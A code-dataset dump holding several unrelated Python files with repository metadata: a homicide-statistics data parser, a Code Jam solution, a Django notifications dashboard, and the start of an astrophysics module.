n.append(convRelation(m[77])) # offender 2 relationship to victim 1
n.append(convCircum(m[78])) # offender 2 circumstance
n.append(convSubCircum(m[79])) # offender 2 sub-circumstance
n.append(convAge(m[80])) # offender 3 age
n.append(convSex(m[81])) # offender 3 sex
n.append(convWeap(m[84])) # offender 3 weapon
n.append(convRelation(m[85])) # offender 3 relationship to victim 1
n.append(convCircum(m[86])) # offender 3 circumstance
n.append(convSubCircum(m[87])) # offender 3 sub-circumstance
n.append(convAge(m[88])) # offender 4 age
n.append(convSex(m[89])) # offender 4 sex
n.append(convWeap(m[92])) # offender 4 weapon
n.append(convRelation(m[93])) # offender 4 relationship to victim 1
n.append(convCircum(m[94])) # offender 4 circumstance
n.append(convSubCircum(m[95])) # offender 4 sub-circumstance
n.append(convAge(m[96])) # offender 5 age
n.append(convSex(m[97])) # offender 5 sex
n.append(convWeap(m[100])) # offender 5 weapon
n.append(convRelation(m[101])) # offender 5 relationship to victim 1
n.append(convCircum(m[102])) # offender 5 circumstance
n.append(convSubCircum(m[103])) # offender 5 sub-circumstance
n.append(convAge(m[104])) # offender 6 age
n.append(convSex(m[105])) # offender 6 sex
n.append(convWeap(m[108])) # offender 6 weapon
n.append(convRelation(m[109])) # offender 6 relationship to victim 1
n.append(convCircum(m[110])) # offender 6 circumstance
n.append(convSubCircum(m[111])) # offender 6 sub-circumstance
n.append(convAge(m[112])) # offender 7 age
n.append(convSex(m[113])) # offender 7 sex
n.append(convWeap(m[116])) # offender 7 weapon
n.append(convRelation(m[117])) # offender 7 relationship to victim 1
n.append(convCircum(m[118])) # offender 7 circumstance
n.append(convSubCircum(m[119])) # offender 7 sub-circumstance
n.append(convAge(m[120])) # offender 8 age
n.append(convSex(m[121])) # offender 8 sex
n.append(convWeap(m[124])) # offender 8 weapon
n.append(convRelation(m[125])) # offender 8 relationship to victim 1
n.append(convCircum(m[126])) # offender 8 circumstance
n.append(convSubCircum(m[127])) # offender 8 sub-circumstance
n.append(convAge(m[128])) # offender 9 age
n.append(convSex(m[129])) # offender 9 sex
n.append(convWeap(m[132])) # offender 9 weapon
n.append(convRelation(m[133])) # offender 9 relationship to victim 1
n.append(convCircum(m[134])) # offender 9 circumstance
n.append(convSubCircum(m[135])) # offender 9 sub-circumstance
n.append(convAge(m[136])) # offender 10 age
n.append(convSex(m[137])) # offender 10 sex
n.append(convWeap(m[140])) # offender 10 weapon
n.append(convRelation(m[141])) # offender 10 relationship to victim 1
n.append(convCircum(m[142])) # offender 10 circumstance
n.append(convSubCircum(m[143])) # offender 10 sub-circumstance
n.append(convAge(m[144])) # offender 11 age
n.append(convSex(m[145])) # offender 11 sex
n.append(convWeap(m[148])) # offender 11 weapon
n.append(convRelation(m[149])) # offender 11 relationship to victim 1
n.append(convCircum(m[150])) # offender 11 circumstance
n.append(convSubCircum(m[151])) # offender 11 sub-circumstance
a.append(array(n))
def gather_type_4(d,a,y):
for m in d:
n = []
n.append(y) # year
n.append(int(m[16])) # month
n.append(m[4]) # state
n.append(groupConvert(m[7],m[8])) # group
n.append(int(m[10])) # population
#n.append(m[5]) # agency code
#n.append(m[14]) # agency name
n.append(int(m[13])) # MSA indication
n.append(int(m[12])) # MSA code
n.append(typeConvert(m[19])) # type of homicide
n.append(sitConvert(m[21])) # situation
n.append(int(m[22]) + 1) # victim count
n.append(int(m[23]) + 1) # offender count
n.append(int(m[24])) # victim 1 age
n.append(convSex(m[25])) # victim 1 sex
n.append(int(m[28])) # victim 2 age
n.append(convSex(m[29])) # victim 2 sex
n.append(int(m[32])) # victim 3 age
n.append(convSex(m[33])) # victim 3 sex
n.append(int(m[36])) # victim 4 age
n.append(convSex(m[37])) # victim 4 sex
n.append(int(m[40])) # victim 5 age
n.append(convSex(m[41])) # victim 5 sex
n.append(int(m[44])) # victim 6 age
n.append(convSex(m[45])) # victim 6 sex
n.append(int(m[48])) # victim 7 age
n.append(convSex(m[49])) # victim 7 sex
n.append(int(m[52])) # victim 8 age
n.append(convSex(m[53])) # victim 8 sex
n.append(int(m[56])) # victim 9 age
n.append(convSex(m[57])) # victim 9 sex
n.append(int(m[60])) # victim 10 age
n.append(convSex(m[61])) # victim 10 sex
n.append(int(m[64])) # victim 11 age
n.append(convSex(m[65])) # victim 11 sex
n.append(int(m[68])) # offender 1 age
n.append(convSex(m[69])) # offender 1 sex
n.append(convWeap(m[72])) # offender 1 weapon
n.append(convRelation(m[73])) # offender 1 relationship to victim 1
n.append(convCircum(m[74])) # offender 1 circumstance
n.append(convSubCircum(m[75])) # offender 1 sub-circumstance
n.append(int(m[76])) # offender 2 age
n.append(convSex(m[77])) # offender 2 sex
n.append(convWeap(m[80])) # offender 2 weapon
n.append(convRelation(m[81])) # offender 2 relationship to victim 1
n.append(convCircum(m[82])) # offender 2 circumstance
n.append(convSubCircum(m[83])) # offender 2 sub-circumstance
n.append(int(m[84])) # offender 3 age
n.append(convSex(m[85])) # offender 3 sex
n.append(convWeap(m[88])) # offender 3 weapon
n.append(convRelation(m[89])) # offender 3 relationship to victim 1
n.append(convCircum(m[90])) # offender 3 circumstance
n.append(convSubCircum(m[91])) # offender 3 sub-circumstance
n.append(int(m[92])) # offender 4 age
n.append(convSex(m[93])) # offender 4 sex
n.append(convWeap(m[96])) # offender 4 weapon
n.append(convRelation(m[97])) # offender 4 relationship to victim 1
n.append(convCircum(m[98])) # offender 4 circumstance
n.append(convSubCircum(m[99])) # offender 4 sub-circumstance
n.append(int(m[100])) # offender 5 age
n.append(convSex(m[101])) # offender 5 sex
n.append(convWeap(m[104])) # offender 5 weapon
n.append(convRelation(m[105])) # offender 5 relationship to victim 1
n.append(convCircum(m[106])) # offender 5 circumstance
n.append(convSubCircum(m[107])) # offender 5 sub-circumstance
n.append(int(m[108])) # offender 6 age
n.append(convSex(m[109])) # offender 6 sex
n.append(convWeap(m[112])) # offender 6 weapon
n.append(convRelation(m[113])) # offender 6 relationship to victim 1
n.append(convCircum(m[114])) # offender 6 circumstance
n.append(convSubCircum(m[115])) # offender 6 sub-circumstance
n.append(int(m[116])) # offender 7 age
n.append(convSex(m[117])) # offender 7 sex
n.append(convWeap(m[120])) # offender 7 weapon
n.append(convRelation(m[121])) # offender 7 relationship to victim 1
n.append(convCircum(m[122])) # offender 7 circumstance
n.append(convSubCircum(m[123])) # offender 7 sub-circumstance
n.append(int(m[124])) # offender 8 age
n.append(convSex(m[125])) # offender 8 sex
n.append(convWeap(m[128])) # offender 8 weapon
n.append(convRelation(m[129])) # offender 8 relationship to victim 1
n.append(convCircum(m[130])) # offender 8 circumstance
n.append(convSubCircum(m[131])) # offender 8 sub-circumstance
n.append(int(m[132])) # offender 9 age
n.append(convSex(m[133])) # offender 9 sex
n.append(convWeap(m[136])) # offender 9 weapon
n.append(convRelation(m[137])) # offender 9 relationship to victim 1
n.append(convCircum(m[138])) # offender 9 circumstance
n.append(convSubCircum(m[139])) # offender 9 sub-circumstance
n.append(int(m[140])) # offender 10 age
n.append(convSex(m[141])) # offender 10 sex
n.append(convWeap(m[144])) # offender 10 weapon
n.append(convRelation(m[145])) # offender 10 relationship to victim 1
n.append(convCircum(m[146])) # offender 10 circumstance
n.append(convSubCircum(m[147])) # offender 10 sub-circumstance
n.append(int(m[148])) # offender 11 age
n.append(convSex(m[149])) # offender 11 sex
n.append(convWeap(m[152])) # offender 11 weapon
n.append(convRelation(m[153])) # offender 11 relationship to victim 1
n.append(convCircum(m[154])) # offender 11 circumstance
n.append(convSubCircum(m[155])) # offender 11 sub-circumstance
a.append(array(n))
def gather_type_5(d,a,y):
for m in d:
n = []
n.append(y) # year
n.append(int(m[16])) # month
n.append(m[5]) # state
n.append(groupConvert(None,m[7])) # group
n.append(int(m[10])) # population
#n.append(m[6]) # agency code
#n.append(m[14]) # agency name
n.append(int(m[13])) # MSA indication
n.append(int(m[12])) # MSA code
n.append(typeConvert(m[19])) # type of homicide
n.append(sitConvert(m[21])) # situation
n.append(int(m[22]) + 1) # victim count
n.append(int(m[23]) + 1) # offender count
n.append(convAge(m[24])) # victim 1 age
n.append(convSex(m[25])) # victim 1 sex
n.append(convAge(m[28])) # victim 2 age
n.append(convSex(m[29])) # victim 2 sex
n.append(convAge(m[32])) # victim 3 age
n.append(convSex(m[33])) # victim 3 sex
n.append(convAge(m[36])) # victim 4 age
n.append(convSex(m[37])) # victim 4 sex
n.append(convAge(m[40])) # victim 5 age
n.append(convSex(m[41])) # victim 5 sex
n.append(convAge(m[44])) # victim 6 age
n.append(convSex(m[45])) # victim 6 sex
n.append(convAge(m[48])) # victim 7 age
n.append(convSex(m[49])) # victim 7 sex
n.append(convAge(m[52])) # victim 8 age
n.append(convSex(m[53])) # victim 8 sex
n.append(convAge(m[56])) # victim 9 age
n.append(convSex(m[57])) # victim 9 sex
n.append(convAge(m[60])) # victim 10 age
n.append(convSex(m[61])) # victim 10 sex
n.append(convAge(m[64])) # victim 11 age
n.append(convSex(m[65])) # victim 11 sex
n.append(int(m[68])) # offender 1 age
n.append(convSex(m[69])) # offender 1 sex
n.append(convWeap(m[72])) # offender 1 weapon
n.append(convRelation(m[73])) # offender 1 relationship to victim 1
n.append(convCircum(m[74])) # offender 1 circumstance
n.append(convSubCircum(m[75])) # offender 1 sub-circumstance
n.append(int(m[76])) # offender 2 age
n.append(convSex(m[77])) # offender 2 sex
n.append(convWeap(m[80])) # offender 2 weapon
n.append(convRelation(m[81])) # offender 2 relationship to victim 1
n.append(convCircum(m[82])) # offender 2 circumstance
n.append(convSubCircum(m[83])) # offender 2 sub-circumstance
n.append(int(m[84])) # offender 3 age
n.append(convSex(m[85])) # offender 3 sex
n.append(convWeap(m[88])) # offender 3 weapon
n.append(convRelation(m[89])) # offender 3 relationship to victim 1
n.append(convCircum(m[90])) # offender 3 circumstance
n.append(convSubCircum(m[91])) # offender 3 sub-circumstance
n.append(int(m[92])) # offender 4 age
n.append(convSex(m[93])) # offender 4 sex
n.append(convWeap(m[96])) # offender 4 weapon
n.append(convRelation(m[97])) # offender 4 relationship to victim 1
n.append(convCircum(m[98])) # offender 4 circumstance
n.append(convSubCircum(m[99])) # offender 4 sub-circumstance
n.append(int(m[100])) # offender 5 age
n.append(convSex(m[101])) # offender 5 sex
n.append(convWeap(m[104])) # offender 5 weapon
n.append(convRelation(m[105])) # offender 5 relationship to victim 1
n.append(convCircum(m[106])) # offender 5 circumstance
n.append(convSubCircum(m[107])) # offender 5 sub-circumstance
n.append(int(m[108])) # offender 6 age
n.append(convSex(m[109])) # offender 6 sex
n.append(convWeap(m[112])) # offender 6 weapon
n.append(convRelation(m[113])) # offender 6 relationship to victim 1
n.append(convCircum(m[114])) # offender 6 circumstance
n.append(convSubCircum(m[115])) # offender 6 sub-circumstance
n.append(int(m[116])) # offender 7 age
n.append(convSex(m[117])) # offender 7 sex
n.append(convWeap(m[120])) # offender 7 weapon
n.append(convRelation(m[121])) # offender 7 relationship to victim 1
n.append(convCircum(m[122])) # offender 7 circumstance
n.append(convSubCircum(m[123])) # offender 7 sub-circumstance
n.append(int(m[124])) # offender 8 age
n.append(convSex(m[125])) # offender 8 sex
n.append(convWeap(m[128])) # offender 8 weapon
n.append(convRelation(m[129])) # offender 8 relationship to victim 1
n.append(convCircum(m[130])) # offender 8 circumstance
n.append(convSubCircum(m[131])) # offender 8 sub-circumstance
n.append(int(m[132])) # offender 9 age
n.append(convSex(m[133])) # offender 9 sex
n.append(convWeap(m[136])) # offender 9 weapon
n.append(convRelation(m[137])) # offender 9 relationship to victim 1
n.append(convCircum(m[138])) # offender 9 circumstance
n.append(convSubCircum(m[139])) # offender 9 sub-circumstance
n.append(int(m[140])) # offender 10 age
n.append(convSex(m[141])) # offender 10 sex
n.append(convWeap(m[144])) # offender 10 weapon
n.append(convRelation(m[145])) # offender 10 relationship to victim 1
n.append(convCircum(m[146])) # offender 10 circumstance
n.append(convSubCircum(m[147])) # offender 10 sub-circumstance
n.append(int(m[148])) # offender 11 age
n.append(convSex(m[149])) # offender 11 sex
n.append(convWeap(m[152])) # offender 11 weapon
n.append(convRelation(m[153])) # offender 11 relationship to victim 1
n.append(convCircum(m[154])) # offender 11 circumstance
n.append(convSubCircum(m[155])) # offender 11 sub-circumstance
a.append(array(n))
def gather_type_6(d,a,y):
for m in d:
n = []
n.append(y) # year
n.append(int(m[16])) # month
n.append(m[5]) # state
n.append(groupConvert(None,m[7])) # group
n.append(int(m[10])) # population
#n.append(m[6]) # agency code
#n.append(m[14]) # agency name
n.append(int(m[13])) # MSA indication
n.append(int(m[12])) # MSA code
n.append(typeConvert(m[19])) # type of homicide
n.append(sitConvert(m[21])) # situation
n.append(int(m[34]) + 1) # victim count
n.append(int(m[35]) + 1) # offender count
oc = n[-1]
n.append(convAge(m[22])) # victim 1 age
n.append(convSex(m[23])) # victim 1 sex
n.append(convAge(m[36])) # victim 2 age
n.append(convSex(m[37])) # victim 2 sex
n.append(convAge(m[40])) # victim 3 age
n.append(convSex(m[41])) # victim 3 sex
n.append(convAge(m[44])) # victim 4 age
n.append(convSex(m[45])) # victim 4 sex
n.append(convAge(m[48])) # victim 5 age
n.append(convSex(m[49])) # victim 5 sex
n.append(convAge(m[52])) # victim 6 age
n.append(convSex(m[53])) # victim 6 sex
n.append(convAge(m[56])) # victim 7 age
n.append(convSex(m[57])) # victim 7 sex
n.append(convAge(m[69])) # victim 8 age
n.append(convSex(m[61])) # victim 8 sex
n.append(convAge(m[64])) # victim 9 age
n.append(convSex(m[65])) # victim 9 sex
n.append(convAge(m[68])) # victim 10 age
n.append(convSex(m[69])) # victim 10 sex
n.append(convAge(m[72])) # victim 11 age
n.append(convSex(m[73])) # victim 11 sex
n.append(int(m[26])) # offender 1 age
n.append(convSex(m[27])) # offender 1 sex
n.append(convWeap(m[30])) # offender 1 weapon
n.append(convRelation(m[31])) # offender 1 relationship to victim 1
n.append(convCircum(m[32])) # offender 1 circumstance
n.append(convSubCircum(m[33])) # offender 1 sub-circumstance
n.append(int(m[76])) # offender 2 age
n.append(convSex(m[77])) # offender 2 sex
n.append(convWeap(m[80])) # offender 2 weapon
n.append(convRelation(m[81])) # offender 2 relationship to victim 1
n.append(convCircum(m[82])) # offender 2 circumstance
n.append(convSubCircum(m[83])) # offender 2 sub-circumstance
n.append(int(m[84])) # offender 3 age
n.append(convSex(m[85])) # offender 3 sex
n.append(convWeap(m[88])) # offender 3 weapon
n.append(convRelation(m[89])) # offender 3 relationship to victim 1
n.append(convCircum(m[90])) # offender 3 circumstance
n.append(convSubCircum(m[91])) # offender 3 sub-circumstance
n.append(int(m[92])) # offender 4 age
n.append(convSex(m[93])) # offender 4 sex
n.append(convWeap(m[96])) # offender 4 weapon
n.append(convRelation(m[97])) # offender 4 relationship to victim 1
n.append(convCircum(m[98])) # offender 4 circumstance
n.append(convSubCircum(m[99])) # offender 4 sub-circumstance
n.append(int(m[100])) # offender 5 age
n.append(convSex(m[101])) # offender 5 sex
n.append(convWeap(m[104])) # offender 5 weapon
n.append(convRelation(m[105])) # offender 5 relationship to victim 1
n.append(convCircum(m[106])) # offender 5 circumstance
n.append(convSubCircum(m[107])) # offender 5 sub-circumstance
n.append(int(m[108])) # offender 6 age
n.append(convSex(m[109])) # offender 6 sex
n.append(convWeap(m[112])) # offender 6 weapon
n.append(convRelation(m[113])) # offender 6 relationship to victim 1
n.append(convCircum(m[114])) # offender 6 circumstance
n.append(convSubCircum(m[115])) # offender 6 sub-circumstance
n.append(int(m[116])) # offender 7 age
n.append(convSex(m[117])) # offender 7 sex
n.append(convWeap(m[120])) # offender 7 weapon
n.append(convRelation(m[121])) # offender 7 relationship to victim 1
n.append(convCircum(m[122])) # offender 7 circumstance
n.append(convSubCircum(m[123])) # offender 7 sub-circumstance
n.append(int(m[124])) # offender 8 age
n.append(convSex(m[125])) # offender 8 sex
n.append(convWeap(m[128])) # offender 8 weapon
n.append(convRelation(m[129])) # offender 8 relationship to victim 1
n.append(convCircum(m[130])) # offender 8 circumstance
n.append(convSubCircum(m[131])) # offender 8 sub-circumstance
n.append(int(m[132])) # offender 9 age
n.append(convSex(m[133])) # offender 9 sex
n.append(convWeap(m[136])) # offender 9 weapon
n.append(convRelation(m[137])) # offender 9 relationship to victim 1
n.append(convCircum(m[138])) # offender 9 circumstance
n.append(convSubCircum(m[139])) # offender 9 sub-circumstance
n.append(int(m[140])) # offender 10 age
n.append(convSex(m[141])) # offender 10 sex
n.append(convWeap(m[144])) # offender 10 weapon
n.append(convRelation(m[145])) # offender 10 relationship to victim 1
n.append(convCircum(m[146])) # offender 10 circumstance
n.append(convSubCircum(m[147])) # offender 10 sub-circumstance
n.append(int(m[148])) # offender 11 age
n.append(convSex(m[149])) # offender 11 sex
n.append(convWeap(m[152])) # offender 11 weapon
n.append(convRelation(m[153])) # offender 11 relationship to victim 1
n.append(convCircum(m[154])) # offender 11 circumstance
n.append(convSubCircum(m[155])) # offender 11 sub-circumstance
a.append(array(n))
def gather_type_7(d,a,y):
for m in d:
n = []
n.append(y) # year
n.append(int(m[12])) # month
n.append(m[1]) # state
n.append(groupConvert(None,m[3])) # group
n.append(int(m[6])) # population
#n.append(m[2]) # agency code
#n.append(m[10]) # agency name
n.append(int(m[9])) # MSA indication
n.append(convMSACode(m[8])) # MSA code
n.append(typeConvert(m[15])) # type of homicide
n.append(sitConvert(m[17])) # situation
n.append(int(m[30]) + 1) # victim count
n.append(int(m[31]) + 1) # offender count
n.append(convAge(m[18])) # victim 1 age
n.append(convSex(m[19])) # victim 1 sex
n.append(convAge(m[32])) # victim 2 age
n.append(convSex(m[33])) # victim 2 sex
n.append(convAge(m[36])) # victim 3 age
n.append(convSex(m[37])) # victim 3 sex
n.append(convAge(m[40])) # victim 4 age
n.append(convSex(m[41])) # victim 4 sex
n.append(convAge(m[44])) # victim 5 age
n.append(convSex(m[45])) # victim 5 sex
n.append(convAge(m[48])) # victim 6 age
n.append(convSex(m[49])) # victim 6 sex
n.append(convAge(m[52])) # victim 7 age
n.append(convSex(m[53])) # victim 7 sex
n.append(convAge(m[56])) # victim 8 age
n.append(convSex(m[57])) # victim 8 sex
n.append(convAge(m[60])) # victim 9 age
n.append(convSex(m[61])) # victim 9 sex
n.append(convAge(m[64])) # victim 10 age
n.append(convSex(m[65])) # victim 10 sex
n.append(convAge(m[68])) # victim 11 age
n.append(convSex(m[69])) # victim 11 sex
n.append(convAge(m[22])) # offender 1 age
n.append(convSex(m[23])) # offender 1 sex
n.append(convWeap(m[26])) # offender 1 weapon
n.append(convRelation(m[27])) # offender 1 relationship to victim 1
n.append(convCircum(m[28])) # offender 1 circumstance
n.append(convSubCircum(m[29])) # offender 1 sub-circumstance
n.append(convAge(m[72])) # offender 2 age
n.append(convSex(m[73])) # offender 2 sex
n.append(convWeap(m[76])) # offender 2 weapon
n.append(convRelation(m[77])) # offender 2 relationship to victim 1
n.append(convCircum(m[78])) # offender 2 circumstance
n.append(convSubCircum(m[79])) # offender 2 sub-circumstance
n.append(convAge(m[80])) # offender 3 age
n.append(convSex(m[81])) # offender 3 sex
n.append(convWeap(m[84])) # offender 3 weapon
n.append(convRelation(m[85])) # offender 3 relationship to victim 1
n.append(convCircum(m[86])) # offender 3 circumstance
n.append(convSubCircum(m[87])) # offender 3 sub-circumstance
n.append(convAge(m[88])) # offender 4 age
n.append(convSex(m[89])) # offender 4 sex
n.append(convWeap(m[92])) # offender 4 weapon
n.append(convRelation(m[93])) # offender 4 relationship to victim 1
n.append(convCircum(m[94])) # offender 4 circumstance
n.append(convSubCircum(m[95])) # offender 4 sub-circumstance
n.append(convAge(m[96])) # offender 5 age
n.append(convSex(m[97])) # offender 5 sex
n.append(convWeap(m[100])) # offender 5 weapon
n.append(convRelation(m[101])) # offender 5 relationship to victim 1
n.append(convCircum(m[102])) # offender 5 circumstance
n.append(convSubCircum(m[103])) # offender 5 sub-circumstance
n.append(convAge(m[104])) # offender 6 age
n.append(convSex(m[105])) # offender 6 sex
n.append(convWeap(m[108])) # offender 6 weapon
n.append(convRelation(m[109])) # offender 6 relationship to victim 1
n.append(convCircum(m[110])) # offender 6 circumstance
n.append(convSubCircum(m[111])) # offender 6 sub-circumstance
n.append(convAge(m[112])) # offender 7 age
n.append(convSex(m[113])) # offender 7 sex
n.append(convWeap(m[116])) # offender 7 weapon
n.append(convRelation(m[117])) # offender 7 relationship to victim 1
n.append(convCircum(m[118])) # offender 7 circumstance
n.append(convSubCircum(m[119])) # offender 7 sub-circumstance
n.append(convAge(m[120])) # offender 8 age
n.append(convSex(m[121])) # offender 8 sex
n.append(convWeap(m[124])) # offender 8 weapon
n.append(convRelation(m[125])) # offender 8 relationship to victim 1
n.append(convCircum(m[126])) # offender 8 circumstance
n.append(convSubCircum(m[127])) # offender 8 sub-circumstance
n.append(convAge(m[128])) # offender 9 age
n.append(convSex(m[129])) # offender 9 sex
n.append(convWeap(m[132])) # offender 9 weapon
n.append(convRelation(m[133])) # offender 9 relationship to victim 1
n.append(convCircum(m[134])) # offender 9 circumstance
n.append(convSubCircum(m[135])) # offender 9 sub-circumstance
n.append(convAge(m[136])) # offender 10 age
n.append(convSex(m[137])) # offender 10 sex
n.append(convWeap(m[140])) # offender 10 weapon
n.append(convRelation(m[141])) # offender 10 relationship to victim 1
n.append(convCircum(m[142])) # offender 10 circumstance
n.append(convSubCircum(None)) # offender 10 sub-circumstance
n.append(convAge(None)) # offender 11 age
n.append(convSex('9')) # offender 11 sex
n.append(convWeap(None)) # offender 11 weapon
n.append(convRelation('99')) # offender 11 relationship to victim 1
n.append(convCircum(None)) # offender 11 circumstance
n.append(convSubCircum(None)) # offender 11 sub-circumstance
a.append(array(n))
data = []
gather_type_1(d1976, data, 1976)
gather_type_1(d1977, data, 1977)
gather_type_1(d1978, data, 1978)
gather_type_1(d1979, data, 1979)
gather_type_2(d1980, data, 1980)
gather_type_2(d1981, data, 1981)
gather_type_2(d1982, data, 1982)
gather_type_3(d1983, data, 1983)
gather_type_1(d1984, data, 1984)
gather_type_1(d1985, data, 1985)
gather_type_1(d1986, data, 1986)
gather_type_4(d1987, data, 1987)
gather_type_4(d1988, data, 1988)
gather_type_4(d1989, data, 1989)
gather_type_4(d1990, data, 1990)
gather_type_4(d1991, data, 1991)
gather_type_4(d1992, data, 1992)
gather_type_5(d1993, data, 1993)
gather_type_6(d1994, data, 1994)
gather_type_6(d1995, data, 1995)
gather_type_6(d1996, data, 1996)
gather_type_6(d1997, data, 1997)
gather_type_3(d1998, data, 1998)
gather_type_3(d1999, data, 1999)
gather_type_3(d2000, data, 2000)
gather_type_3(d2001, data, 2001)
gather_type_7(d2002, data, 2002)
gather_type_7(d2003, data, 2003)
gather_type_7(d2004, data, 2004)
gather_type_7(d2005, data, 2005)
gather_type_7(d2006, data, 2006)
gather_type_7(d2007, data, 2007)
gather_type_7(d2008, data, 2008)
gather_type_7(d2009, data, 2009)
gather_type_7(d2010, data, 2010)
gather_type_7(d2011, data, 2011)
gather_type_7(d2012, data, 2012)
data = array(data).astype('i')
save('data/data', data)
| [
"cummings.evan@gmail.com"
] | cummings.evan@gmail.com |
1f956806ded26833499f7cf94f5aa6c07baf85ca | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_62/226.py | 7ad140bdb3f8909e25cea0499824da525e9f42ab | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 364 | py | fi=open("A-large.in")#")
import sys
sys.stdout=open("out.out",'w')
T=int(fi.readline())
for i in range(T):
N=int(fi.readline())
lst=[map(int,fi.readline().split()) for j in range(N)]
cnt=0
for j in range(N):
for k in range(j+1,N):
cnt+=(lst[k][0]>lst[j][0])==(lst[k][1]<lst[j][1])
print "Case #%d: %d"%(i+1,cnt)
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
d2e0473e0664d8e1a1e333368970ecc639a0840e | 1e8142725aa06844713d18fa38c6779aff8f8171 | /tndata_backend/notifications/views.py | cfeca79f817dd6db55ce8cd517ebe98b2e9b6884 | [
"MIT"
] | permissive | tndatacommons/tndata_backend | 8f4db3e5cf5272901c9087a85e21d7560240bb3b | 3d22179c581ab3da18900483930d5ecc0a5fca73 | refs/heads/master | 2020-12-03T07:53:17.339769 | 2017-03-27T06:18:58 | 2017-03-27T06:18:58 | 68,407,220 | 1 | 2 | null | 2017-03-27T06:18:59 | 2016-09-16T18:59:16 | Python | UTF-8 | Python | false | false | 6,049 | py | from collections import defaultdict
from datetime import datetime, timedelta
from django.contrib.auth import get_user_model
from django.contrib.auth.decorators import login_required, user_passes_test
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.http import JsonResponse
from django.shortcuts import get_object_or_404, render, redirect
from django.utils import timezone
from . import queue
from .forms import GCMMessageForm
from .models import GCMMessage
@login_required
def send_message(request):
"""A quick & easy way to send test notifications."""
if request.method == "POST":
form = GCMMessageForm(request.POST)
if form.is_valid():
msg = form.save(commit=False)
msg.user = request.user
msg.deliver_on = timezone.now()
msg.priority = GCMMessage.HIGH
msg.save()
msg.send()
messages.success(request, "Your notification has been sent")
return redirect(reverse("notifications:view", args=[msg.id]))
else:
form = GCMMessageForm()
context = {
'form': form,
}
return render(request, 'notifications/send_message.html', context)
@login_required
def view_message(request, message_id):
msg = get_object_or_404(GCMMessage, pk=message_id)
return render(request, 'notifications/view_message.html', {'message': msg})
@user_passes_test(lambda u: u.is_staff, login_url='/')
def dashboard(request):
"""A simple dashboard for enqueued GCM notifications."""
devices = None
User = get_user_model()
# If we have specified a user, show their Queue details.
date = request.GET.get('date', None) or None
if date is None:
date = timezone.now().date()
else:
date = datetime.strptime(date, "%Y-%m-%d").date()
user = None
email = request.GET.get('user', None)
user_queues = [] # Prioritized user queue
try:
user = User.objects.get(email__icontains=email)
devices = user.gcmdevice_set.count()
user_queues.append(queue.UserQueue.get_data(user, date=date))
date = date + timedelta(days=1)
user_queues.append(queue.UserQueue.get_data(user, date=date))
except (User.DoesNotExist, ValueError, TypeError):
if user is not None:
messages.warning(request, "No data found for '{}'".format(user))
except User.MultipleObjectsReturned:
messages.warning(request, "Multiple Users found for '{}'".format(user))
if user:
# Get all the enqueued jobs, & keep a list of the Job.ID values.
jobs = queue.messages()
job_ids = [job.args[0] for job, _ in jobs]
# Build a dict of the user's message data matching those Jobs.
message_data = defaultdict(dict)
for msg in user.gcmmessage_set.filter(pk__in=job_ids):
message_data[msg.id] = {
'id': msg.id,
'title': msg.title,
'user_id': msg.user_id,
'email': msg.user.email,
'message': msg.message,
'title': msg.title,
'date_string': msg.deliver_on.strftime("%Y-%m-%d"),
'queue_id': msg.queue_id,
}
# Restrict the list of jobs to those intended for the given user.
jobs = [
(job, scheduled_for, message_data[job.args[0]])
for job, scheduled_for in jobs if job.args[0] in message_data
]
else:
jobs = []
context = {
'devices': devices,
'email': email,
'num_jobs': queue.get_scheduler().count(),
'jobs': jobs,
'metrics': ['GCM Message Sent', 'GCM Message Scheduled'],
'selected_date': date,
'selected_user': user,
'user_queues': user_queues,
}
return render(request, "notifications/index.html", context)
@user_passes_test(lambda u: u.is_staff, login_url='/')
def userqueue(request, user_id, date):
"""Return UserQueue details; i.e. the sheduled notifications/jobs for the
user for a given date.
"""
user = get_object_or_404(get_user_model(), pk=user_id)
date = datetime.strptime(date, '%Y-%m-%d')
data = queue.UserQueue.get_data(user, date)
# massage that data a bit.
results = {}
for key, values in data.items():
if 'count' in key:
results['count'] = values
elif 'low' in key:
results['low'] = values
elif 'medium' in key:
results['medium'] = values
elif 'high' in key:
results['high'] = values
results['date'] = date.strftime("%Y-%m-%d")
results['user'] = user.get_full_name()
return JsonResponse(results)
@user_passes_test(lambda u: u.is_staff, login_url='/')
def cancel_job(request):
"""Look for an enqueued job with the given ID and cancel it."""
job_id = request.POST.get('job_id', None)
if request.method == "POST" and job_id:
for job, _ in queue.messages():
if job.id == job_id:
job.cancel()
messages.success(request, "That notification has been cancelled")
break
return redirect("notifications:dashboard")
@user_passes_test(lambda u: u.is_staff, login_url='/')
def cancel_all_jobs(request):
"""Cancels queued messages."""
count = 0
if request.method == "POST" and request.POST.get('orphaned') == 'on':
# Sometimes we end up with orphaned jobs (e.g. a user is deleted, but
# GCMMessage's delete signal handler doesn't fire).
queue_ids = list(GCMMessage.objects.values_list('queue_id', flat=True))
jobs = [job for job, _ in queue.messages() if job.id not in queue_ids]
for job in jobs:
job.cancel()
count += 1
elif request.method == "POST":
for job, _ in queue.messages():
job.cancel()
count += 1
messages.success(request, "Cancelled {} notifications.".format(count))
return redirect("notifications:dashboard")
| [
"brad@bradmontgomery.net"
] | brad@bradmontgomery.net |
230162e5df126366654a8c367c828b2b6bc6631e | 0ef635d35345f624c3011c1d7d296df96a7c6433 | /gala/dynamics/_genfunc/genfunc_3d.py | 013e78fb187b8b91795c531836549dc7b1ab7ad7 | [
"MIT",
"MPL-1.1"
] | permissive | cbjuan/gala | edd07d08f5a741d5b15848cbd6ab25872ca941a5 | bf1d616258b3856da7550eddf49cf26ec9865996 | refs/heads/master | 2020-04-08T23:58:21.360489 | 2018-11-24T01:56:08 | 2018-11-24T01:56:08 | 159,847,691 | 1 | 0 | MIT | 2018-11-30T16:09:34 | 2018-11-30T16:09:34 | null | UTF-8 | Python | false | false | 15,682 | py | # Solving the series of linear equations for true action
# and generating function Fourier components
import numpy as np
import matplotlib.pyplot as plt
from scipy.integrate import odeint
from matplotlib.ticker import MaxNLocator
import matplotlib.cm as cm
import time
# in units kpc, km/s and 10^11 M_solar
Grav = 430091.7270069976
Conv = 0.9777922216
